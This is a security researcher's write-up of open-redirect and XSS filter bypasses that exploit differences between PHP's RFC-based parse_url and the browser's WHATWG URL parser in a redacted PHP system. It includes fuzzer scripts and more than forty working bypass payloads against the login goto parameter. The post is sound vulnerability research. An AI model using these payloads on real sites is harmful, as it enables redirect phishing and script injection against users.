A Study of the Inconsistencies Between the WHATWG URL Standard and the RFC URL Standards

无在无不在 2023-03-17 21:57:29

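In August 2022, while hunting for bugs in the Topsec (天融信) SRC program, I noticed that one of Topsec's sites ran the redacted system, so I downloaded the redacted source code from GitHub and audited it.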

Source & Sink

The audit showed that the redacted system uses a goto parameter for page redirects in many places, for example in the login feature:

http://demo.redacted.com/login?goto=/

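When an already logged-in user visits this URL, the backend reads the value of the goto parameter and writes it into the custom data-goto attribute of a div tag in a Twig template: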

{% block content %}
<div id="page-message-container" class="page-message-container" data-goto="{{ goto }}" data-duration={{ duration }}>
  <div class="page-message-panel">
    <div class="page-message-heading">
      <h2 class="page-message-title">{{ title|trans }}</h2>
    </div>
    <div class="page-message-body">{{ message|default('')|trans|raw }}</div>
  </div>
</div>
{% endblock %}

The frontend then reads the data-goto attribute with the following JS code and navigates by assigning it to window.location.href:

function (e, t) {
        var n = $("#page-message-container"),
            r = n.data("goto"),
            o = n.data("duration");
        o > 0 && r && setTimeout((function () {
            window.location.href = r
        }), o)
 }

Sanitizer/Filter

To keep these redirects from turning into open redirect (OR) or XSS vulnerabilities, redacted has a dedicated backend filter that sanitizes the URL in the goto parameter:

    /**
     * Filter a URL.
     *
     * If the URL does not belong to this site's domain, return the site's homepage URL.
     *
     * @param $url string the URL to filter
     *
     * @return string
     */
    public function filterRedirectUrl($url)
    {
        $host = $this->get('request_stack')->getCurrentRequest()->getHost();
        $safeHosts = [$host];

        $parsedUrl = parse_url($url);
        $isUnsafeHost = isset($parsedUrl['host']) && !in_array($parsedUrl['host'], $safeHosts);
        $isInvalidUrl = isset($parsedUrl['scheme']) && !in_array($parsedUrl['scheme'], ['http', 'https']);

        if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
            $url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
        }

        return strip_tags($url);
    }

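The filter works roughly as follows:
1. Take the Host request header from the HTTP request and use it as the host whitelist.
2. Define the scheme whitelist: http, https.
3. Parse the incoming URL with PHP's URL parser (parse_url) to obtain the host and scheme parts.
4. Whenever a host part or a scheme part is present, check it against the corresponding whitelist.
5. Otherwise, treat the input as a relative URL.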

Bypassing the host check

How can the filter's host check be bypassed?
I remembered a payload I had previously used to bypass SSRF filters:

https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/

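This payload works because the backend and frontend URL parsers disagree:

  • PHP's parse_url takes the host part of the URL to be demo.redacted.com, which matches the Host header of the HTTP request, so the check passes.
  • The JS URL parser sees it differently: it normalizes \ to /, so after parsing the payload becomes:
http://baidu.com/@demo.redacted.com/

So the frontend takes the host part of the URL to be baidu.com.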

> new URL('http://baidu.com\\@demo.redacted.com/')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com', }
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/@demo.redacted.com/"
origin: "http://baidu.com"
password: ""
pathname: "/@demo.redacted.com/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""
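
As a rough illustration of the disagreement described above, the following JavaScript sketch compares a deliberately naive authority split with the WHATWG parser behind new URL. The helper naiveHost is hypothetical and is only an assumption about how an "everything before the last @ is userinfo" reading behaves; it is not PHP's actual parse_url algorithm.

```javascript
// Naive reading of "scheme://userinfo@host/path": the host is whatever
// follows the last "@" inside the authority component.
// Hypothetical helper for illustration only, not PHP's parse_url.
function naiveHost(url) {
  const afterScheme = url.slice(url.indexOf('://') + 3);
  const authority = afterScheme.split(/[/?#]/)[0];
  return authority.slice(authority.lastIndexOf('@') + 1);
}

const hostPayload = 'http://baidu.com\\@demo.redacted.com/';

// The naive split keeps the backslash inside the userinfo part.
const naiveResult = naiveHost(hostPayload);

// The WHATWG parser treats "\" like "/" for http URLs, ending the host early.
const whatwgResult = new URL(hostPayload).host;

console.log(naiveResult);  // demo.redacted.com
console.log(whatwgResult); // baidu.com
```

The two results differ for the same string, which is exactly the gap the payload relies on.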

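Bypassing the scheme check

Bypassing the host check alone only yields an open redirect. To get XSS, we also need to bypass the backend's scheme check. How?

One way in: vulnerabilities usually come from wrong assumptions in a program, so we can look for the wrong assumptions the filter makes and then try to break them.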

$parsedUrl = parse_url($url);
$isUnsafeHost = isset($parsedUrl['host']) && ! in_array($parsedUrl['host'], $safeHosts);
$isInvalidUrl = isset($parsedUrl['scheme']) && ! in_array($parsedUrl['scheme'], ['http', 'https']);

if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
    $url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
}
return strip_tags($url);

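Looking at the filter code again, the filter assumes:
1. If no host and no scheme can be parsed out of the URL, it must be a relative URL.
2. A "relative URL" is always safe.

So what happens if we make parse_url return false?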

false['host'] === NULL
false['scheme'] === NULL 

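The filter then concludes that the URL has no host and no scheme, so it must be a relative URL! And since a relative URL is assumed to be safe, it is returned to the frontend as is.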
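
To make the flawed assumption concrete, here is a minimal JavaScript model of the filter's decision logic. It is a sketch, not the redacted code: the function isRejected and its parsed argument are hypothetical, with parsed standing in for whatever PHP's parse_url returned (an object with optional host and scheme keys, or false), and url === '' only approximates PHP's empty().

```javascript
// Hypothetical model of the PHP filter's decision, for illustration only.
// `parsed` stands in for the return value of PHP's parse_url().
function isRejected(url, parsed, allowedHosts) {
  // PHP's isset($parsedUrl['host']) is false when $parsedUrl itself is false.
  const hasHost = Boolean(parsed) && parsed.host !== undefined;
  const hasScheme = Boolean(parsed) && parsed.scheme !== undefined;

  const isUnsafeHost = hasHost && !allowedHosts.includes(parsed.host);
  const isInvalidUrl = hasScheme && !['http', 'https'].includes(parsed.scheme);

  // Approximation of PHP's empty($url).
  return url === '' || isUnsafeHost || isInvalidUrl;
}

const allowedHosts = ['demo.redacted.com'];

// A normally parsed javascript: URL is caught by the scheme check.
const rejectedWhenParsed = isRejected(
  'javascript:alert(1)',
  { scheme: 'javascript', path: 'alert(1)' },
  allowedHosts
);

// If parsing fails, neither check fires and the URL is accepted.
const rejectedWhenParseFails = isRejected('javascript:///%0dalert(1)', false, allowedHosts);

console.log(rejectedWhenParsed);     // true
console.log(rejectedWhenParseFails); // false
```

In this model a failed parse and a genuinely relative URL are indistinguishable, which is the assumption the later payloads exploit.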

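How do we make parse_url return false?

PHP's URL parser is essentially an implementation of the RFCs, so when an incoming URL is malformed badly enough by RFC standards, parse_url returns false.

A classic payload, for example, produces an open redirect in an even simpler way: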

https://demo.redacted.com/login?goto=http:///baidu.com 

RFC 1738 specifies that in a hierarchical absolute URL, the part after the scheme must start with //:

The scheme specific data start with a double slash "//" to indicate that it complies with the common Internet scheme syntax.

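PHP's URL parser therefore treats http:///baidu.com as an invalid URL and returns false, so the filter skips the remaining checks and returns the URL to the frontend.

The frontend URL parser disagrees, though. It normalizes http:///baidu.com to http://baidu.com: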

> new URL('http:///baidu.com')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com', }
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/"
origin: "http://baidu.com"
password: ""
pathname: "/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""

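This results in an open redirect.

What if we swap the http scheme for the javascript scheme? The RFC only says that hierarchical URLs must contain the // prefix; it does not clearly say how a URL parser should handle a non-hierarchical URL that contains a // prefix.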

javascript:alert(1)
javascript://alert(1)
mailto:happyhacking@qq.com 
mailto://happyhacking@qq.com 

That led me to the following payload:

https://demo.redacted.com/login?goto=javascript:///%250dalert(1)

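PHP's URL parser treats javascript:///%250dalert(1) as an invalid URL and returns false, so the filter skips the scheme check and accepts it as a safe "relative URL".

The frontend URL parser, however, has its own ideas.

Once reflected to the frontend, the payload looks like this: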

window.location.href = 'javascript:///%0dalert(1)'

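The browser sees the scheme javascript, percent-decodes the rest of the URL (turning %0d into a carriage return, \r), and hands the result to the JS engine. The JS engine treats // as the start of a single-line comment, and since \r is a line terminator, alert(1) becomes JS code on the following line.

The result is XSS.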
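
The comment-then-newline trick can be checked outside a browser with a small sketch. It assumes that evaluating a string with new Function is a fair stand-in for how the body of a javascript: URL is run, and it replaces alert(1) with return 1 so that the result is observable in any JS runtime.

```javascript
// Body of the javascript: URL after %0d has been percent-decoded to CR.
// "return 1" stands in for alert(1) so the snippet runs outside a browser.
const decodedBody = decodeURIComponent('///%0dreturn 1');

// "//" opens a single-line comment, the CR ends it, and the rest executes.
const withCarriageReturn = new Function(decodedBody)();

// Without the CR, everything after "//" stays inside the comment.
const withoutCarriageReturn = new Function('///return 1')();

console.log(withCarriageReturn);    // 1
console.log(withoutCarriageReturn); // undefined
```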

Further research

Could a fuzzer uncover more inconsistencies between the JS URL parser and the PHP URL parser?

http:{char}//localhost:80/xxxx

Can we find a character to place between http: and // (the {char} position) such that the frontend URL parser still takes the host part of the URL to be localhost?

The fuzzer:

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL('http:'+String.fromCodePoint(i)+'//localhost:80/xxxx')
  if(url['host'] == 'localhost' ){
    console.log(i+':URL encoded i : '+encodeURI(String.fromCodePoint(i)))
    log.push(i);
  }
  }catch(e){}
}
log

Results from the frontend URL parser:

9: URL encoded i : %09 -> http:%09//localhost
10: URL encoded i : %0A -> http:%0a//localhost
13: URL encoded i : %0D -> http:%0d//localhost
47: URL encoded i : / -> http:///localhost
92: URL encoded i : %5C -> http:\//localhost

And how does PHP's URL parser handle these?

 ["http:%09//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "%09//localhost"
  }
  ["http:   //localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "   //localhost"
  }
  ["http:%0a//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "%0a//localhost"
  }
  ["http:\//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(12) "\//localhost"
  }
  ["http:///localhost"]=>
  bool(false)

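As we can see, when PHP's URL parser meets these payloads it either treats everything after http: as the path, or considers the URL invalid and returns false.

In other words, the following payloads also get past redacted's filter and cause an open redirect: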

https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com
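
The same kind of comparison can be reproduced entirely in JavaScript. The sketch below uses the reference regular expression from RFC 3986, Appendix B as a stand-in for an RFC-style parser. That choice is an assumption made for illustration: the regex is not PHP's parse_url, although for these particular inputs it agrees with the dumps above in reporting a scheme and a path but no authority. The helper names rfcSplit and compareParsers are hypothetical.

```javascript
// RFC 3986, Appendix B: reference regular expression for splitting a URI.
const RFC3986_SPLIT = /^(([^:\/?#]+):)?(\/\/([^\/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?/;

// Split a string the way the RFC regex does (every group is optional,
// so the regex always matches).
function rfcSplit(input) {
  const m = RFC3986_SPLIT.exec(input);
  return { scheme: m[2], authority: m[4], path: m[5] };
}

// Put the RFC-style view next to the WHATWG view of the same input.
function compareParsers(input) {
  const rfc = rfcSplit(input);
  let whatwgHost = null;
  try {
    whatwgHost = new URL(input).host;
  } catch (e) {
    // new URL throws on input it cannot parse; keep null in that case.
  }
  return { rfcScheme: rfc.scheme, rfcAuthority: rfc.authority, rfcPath: rfc.path, whatwgHost };
}

const comparison = ['http:\t//localhost', 'http:\n//localhost', 'http:\\//localhost']
  .map(compareParsers);

// For each input the RFC split finds no authority at all,
// while the WHATWG parser reports the host "localhost".
console.log(comparison);
```

Any filter that trusts the first view while the browser acts on the second is exposed to the payloads listed above.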

http{char}://localhost:80/xxxx

Can we find a character to insert between http and :// such that the frontend URL parser still takes the host part to be localhost and the scheme part to be http?

fuzzer:

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL('http'+String.fromCodePoint(i)+'://localhost:80/xxxx')
  if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
    console.log('i: '+i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)));
    console.log(url);
    log.push(i);
  }
  }catch(e){}
}
log

Results from the frontend URL parser:

9: URL encoded i : %09
10: URL encoded i : %0A
13: URL encoded i : %0D

This time only three characters turn up; / and \ are gone. That gives the following three payloads:

http%09://baidu.com
http%0a://baidu.com
http%0d://baidu.com 

How does PHP's URL parser handle them?

  ["http%09://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%09://localhost:80/xxx"
  }
  ["http%0a://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%0a://localhost:80/xxx"
  }
  ["http%0d://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%0d://localhost:80/xxx"
  }

PHP treats the entire URL as the path, that is, as a relative URL.

This bypasses both the filter's scheme check and its host check:

window.location.href='http\n://localhost:80/xxx' // works!
window.location.href='javascript\n:alert(1)' // works!
window.location.href='javascript\r:alert(1)' // works!
window.location.href='javascript\t:alert(1)' // works!

payload:

https://demo.redacted.com/login?goto=javascript%0d:alert(1) // works!
https://demo.redacted.com/login?goto=javascript%0a:alert(1) // works!
https://demo.redacted.com/login?goto=javascript%09:alert(1) // works!
https://demo.redacted.com/login?goto=http%09://baidu.com // works!

{char}http://localhost:80/xxxx

Can we find a character to put in front of the http scheme such that the frontend URL parser still takes the host part to be localhost and the scheme part to be http?

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL(String.fromCodePoint(i)+'http://localhost:80/xxxx')
  if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
    console.log(`i: ${i} ,URL encoded i : `+encodeURI(String.fromCodePoint(i))+' string begin:'+String.fromCodePoint(i)+'string end')
    log.push(i);
  }
  }catch(e){}
}
log
log.forEach(i=>{
    //console.log(encodeURI(String.fromCodePoint(i))+'http://localhost:80/xxxx')
    console.log(encodeURI(String.fromCodePoint(i))+'javascript:alert(1)')
})

This produces the following payloads:

%00http://localhost:80/xxxx
%01http://localhost:80/xxxx
%02http://localhost:80/xxxx
%03http://localhost:80/xxxx
%04http://localhost:80/xxxx
%05http://localhost:80/xxxx
%06http://localhost:80/xxxx
%07http://localhost:80/xxxx
%08http://localhost:80/xxxx
%09http://localhost:80/xxxx
%0Ahttp://localhost:80/xxxx
%0Bhttp://localhost:80/xxxx
%0Chttp://localhost:80/xxxx
%0Dhttp://localhost:80/xxxx
%0Ehttp://localhost:80/xxxx
%0Fhttp://localhost:80/xxxx
%10http://localhost:80/xxxx
%11http://localhost:80/xxxx
%12http://localhost:80/xxxx
%13http://localhost:80/xxxx
%14http://localhost:80/xxxx
%15http://localhost:80/xxxx
%16http://localhost:80/xxxx
%17http://localhost:80/xxxx
%18http://localhost:80/xxxx
%19http://localhost:80/xxxx
%1Ahttp://localhost:80/xxxx
%1Bhttp://localhost:80/xxxx
%1Chttp://localhost:80/xxxx
%1Dhttp://localhost:80/xxxx
%1Ehttp://localhost:80/xxxx
%1Fhttp://localhost:80/xxxx
%20http://localhost:80/xxxx

Replacing the http scheme with the javascript scheme:

%00javascript:alert(1)
%01javascript:alert(1)
%02javascript:alert(1)
%03javascript:alert(1)
%04javascript:alert(1)
%05javascript:alert(1)
%06javascript:alert(1)
%07javascript:alert(1)
%08javascript:alert(1)
%09javascript:alert(1)
%0Ajavascript:alert(1)
%0Bjavascript:alert(1)
%0Cjavascript:alert(1)
%0Djavascript:alert(1)
%0Ejavascript:alert(1)
%0Fjavascript:alert(1)
%10javascript:alert(1)
%11javascript:alert(1)
%12javascript:alert(1)
%13javascript:alert(1)
%14javascript:alert(1)
%15javascript:alert(1)
%16javascript:alert(1)
%17javascript:alert(1)
%18javascript:alert(1)
%19javascript:alert(1)
%1Ajavascript:alert(1)
%1Bjavascript:alert(1)
%1Cjavascript:alert(1)
%1Djavascript:alert(1)
%1Ejavascript:alert(1)
%1Fjavascript:alert(1)
%20javascript:alert(1)

How does PHP's URL parser handle them?

  ["%00http://localhost:80/xxxx"]=>
  array(1) {
    ["path"]=>
    string(27) "%00http://localhost:80/xxxx"
  }
  ["%01http://localhost:80/xxxx"]=>
  array(1) {
    ["path"]=>
    string(27) "%01http://localhost:80/xxxx"
  }
  ["%1Djavascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "%1Djavascript:alert(1)"
  }
  ["%1Ejavascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "%1Ejavascript:alert(1)"
  }

PHP's URL parser treats the entire URL as a relative URL.

So all of the following payloads bypass both the scheme check and the host check of the redacted filter:

https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)

ht{char}tp://localhost:80/xxxx

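Let's be a bit bolder: can we find a character to insert inside the word http such that the frontend URL parser still takes the scheme part to be http and the host part to be localhost?

The fuzzer: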

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL('ht'+String.fromCodePoint(i)+'tp://localhost:80/xxxx')
  if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
    console.log('i: '+i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)));
    console.log(url);
    log.push(i);
  }
  }catch(e){}
}
log

Output:

i: 9 URL encoded i : %09
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
i: 10 URL encoded i : %0A
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
i: 13 URL encoded i : %0D
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
Array(3) [ 9, 10, 13 ]

This gives the following payloads:

ht%0dtp://localhost
ht%0atp://localhost
ht%09tp://localhost
java%09script:alert(1)
java%0dscript:alert(1)
java%0ascript:alert(1)

So how does PHP's URL parser deal with these malformed URLs?

  ["ht%0dtp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%0dtp://localhost"
  }
  ["ht%0atp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%0atp://localhost"
  }
  ["ht%09tp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%09tp://localhost"
  }
  ["java%09script:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%09script:alert(1)"
  }
  ["java%0dscript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%0dscript:alert(1)"
  }
  ["java%0ascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%0ascript:alert(1)"
  }

Once again PHP's URL parser treats all of these as "well-formed" relative URLs, and every one of them passes the redacted filter:

https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)

In fact, these three characters can be placed anywhere in the scheme:

https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

Summary of payloads

Digging further into the inconsistencies between the JavaScript URL parser and the PHP URL parser, I found more than forty ways to bypass the redacted filter:

https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/
https://demo.redacted.com/login?goto=javascript:///%250dalert(1)
https://demo.redacted.com/login?goto=http:///www.baidu.com
https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com
https://demo.redacted.com/login?goto=javascript%0d:alert(1) 
https://demo.redacted.com/login?goto=javascript%0a:alert(1) 
https://demo.redacted.com/login?goto=javascript%09:alert(1) 
https://demo.redacted.com/login?goto=http%09://baidu.com 
https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)
https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

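Root cause

Why are the JavaScript URL parser and the PHP URL parser so inconsistent with each other?

Because there are two URL parsing standards in the world: the RFC standards and the WHATWG standard. WHATWG, taking the RFCs as a reference, wrote its own standard: URL parsing.

The browser-side JavaScript URL parser follows the WHATWG standard, while the PHP URL parser follows the RFCs. Node.js ships both kinds of URL parser, url.parse and new URL: the former (a legacy API) follows the RFC approach and the latter follows the WHATWG standard.

The WHATWG URL parsing standard specifies: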

  1. If input contains any leading or trailing C0 control or space, validation error.
  2. Remove any leading and trailing C0 control or space from input.

If the input URL has C0 control characters or spaces at its beginning or end, the parser reports a validation error and then removes all leading and trailing C0 controls and spaces from the input. C0 control covers 0x00-0x1F and space is 0x20, so C0 control + space covers 0x00-0x20.

What is a validation error?

A validation error indicates a mismatch between input and valid input. User agents, especially conformance checkers, are encouraged to report them somewhere. A validation error does not mean that the parser terminates. Termination of a parser is always stated explicitly, e.g., through a return statement.

In other words, a validation error only marks a mismatch between the input and valid input; it does not stop parsing, and the standard merely encourages implementations to report it somewhere.

That is why the following payloads work:

https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
...
https://demo.redacted.com/login?goto=%20javascript:alert(1)
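
The stripping step quoted above can be sketched in a few lines of JavaScript and checked against new URL. The helper stripC0AndSpace is a hypothetical name for illustration; it models only this one preprocessing step, not the full WHATWG parsing algorithm.

```javascript
// WHATWG: "Remove any leading and trailing C0 control or space from input."
// "C0 control or space" is the code point range U+0000..U+0020.
function stripC0AndSpace(input) {
  return input.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
}

// Prefix the javascript: URL with every code point in the range and check
// that both the sketch and the real parser ignore the prefix.
const ignoredPrefixes = [];
for (let cp = 0x00; cp <= 0x20; cp++) {
  const input = String.fromCodePoint(cp) + 'javascript:alert(1)';
  const strippedOk = stripC0AndSpace(input) === 'javascript:alert(1)';
  const parsedAsJavascript = new URL(input).protocol === 'javascript:';
  if (strippedOk && parsedAsJavascript) ignoredPrefixes.push(cp);
}

console.log(ignoredPrefixes.length); // 33
```

All 33 code points from 0x00 to 0x20 are ignored, matching the %00 through %20 payload list.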

The standard also specifies:

  1. If input contains any ASCII tab or newline, validation error.
  2. Remove all ASCII tab or newline from input.

Which characters count as ASCII tab or newline?

An ASCII tab or newline is U+0009 TAB, U+000A LF, or U+000D CR.

So in the payloads below, %0d, %0a and %09 are all removed by the JavaScript URL parser:

https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

In other words, the three characters %0d, %0a and %09 can be placed anywhere in a URL to obfuscate it, because the JavaScript URL parser removes them anyway. For example:

new URL('http:/\x09/baidu.com') 

URL {
    origin: 'http://baidu.com', 
    protocol: 'http:', 
    username: '', 
    password: '', 
    host: 'baidu.com'
}
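
The tab and newline removal can be modeled the same way. In this sketch, removeTabAndNewline is a hypothetical helper that covers only the quoted preprocessing step; each sample is parsed both raw and after cleaning to confirm that new URL sees the same URL either way.

```javascript
// WHATWG: "Remove all ASCII tab or newline from input."
// ASCII tab or newline is U+0009 TAB, U+000A LF, or U+000D CR.
function removeTabAndNewline(input) {
  return input.replace(/[\t\n\r]/g, '');
}

const obfuscated = [
  'java\tscript:alert(1)',
  'java\nsc\nript:alert(1)',
  'ht\rtp://baidu.com',
  'http:/\t/baidu.com',
];

// For each sample: the cleaned string, the scheme the real parser reports,
// and whether raw and cleaned inputs serialize to the same URL.
const tabReport = obfuscated.map((raw) => {
  const cleaned = removeTabAndNewline(raw);
  return {
    cleaned,
    protocol: new URL(raw).protocol,
    sameAsCleaned: new URL(raw).href === new URL(cleaned).href,
  };
});

console.log(tabReport);
```

A server-side check that inspects the raw string therefore looks at a different URL than the one the browser ends up navigating to.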

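Conclusion

Few things are worse than having two standards for the same thing: when the standards are inconsistent, the implementations inevitably are too. Security problems caused by such inconsistencies are hard to see, because each system looks fine when audited on its own, and the problem only appears once several systems are wired together. Auditing therefore has to consider the whole system, not just individual components.

It is also worth noting that wherever a standard or specification is silent or ambiguous, the developers implementing it will understand it differently, and the languages, libraries, frameworks and software built on the standard will diverge. That divergence is fertile ground for new attack techniques.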

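+--------------------------------------------------------------+
| Two competing standards / ambiguous wording / unspecified    |
| behavior / different versions of a standard                  |
+--------------------------------------------------------------+
                               |
                               v
                +------------------------------+
                | Inconsistent implementations |
                +------------------------------+
                               |
                               v
           +---------------------------------------+
           | Bypass tricks / new attack techniques |
           +---------------------------------------+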


Author: 无在无不在, blog: https://shangrui-hash.github.io/zh/
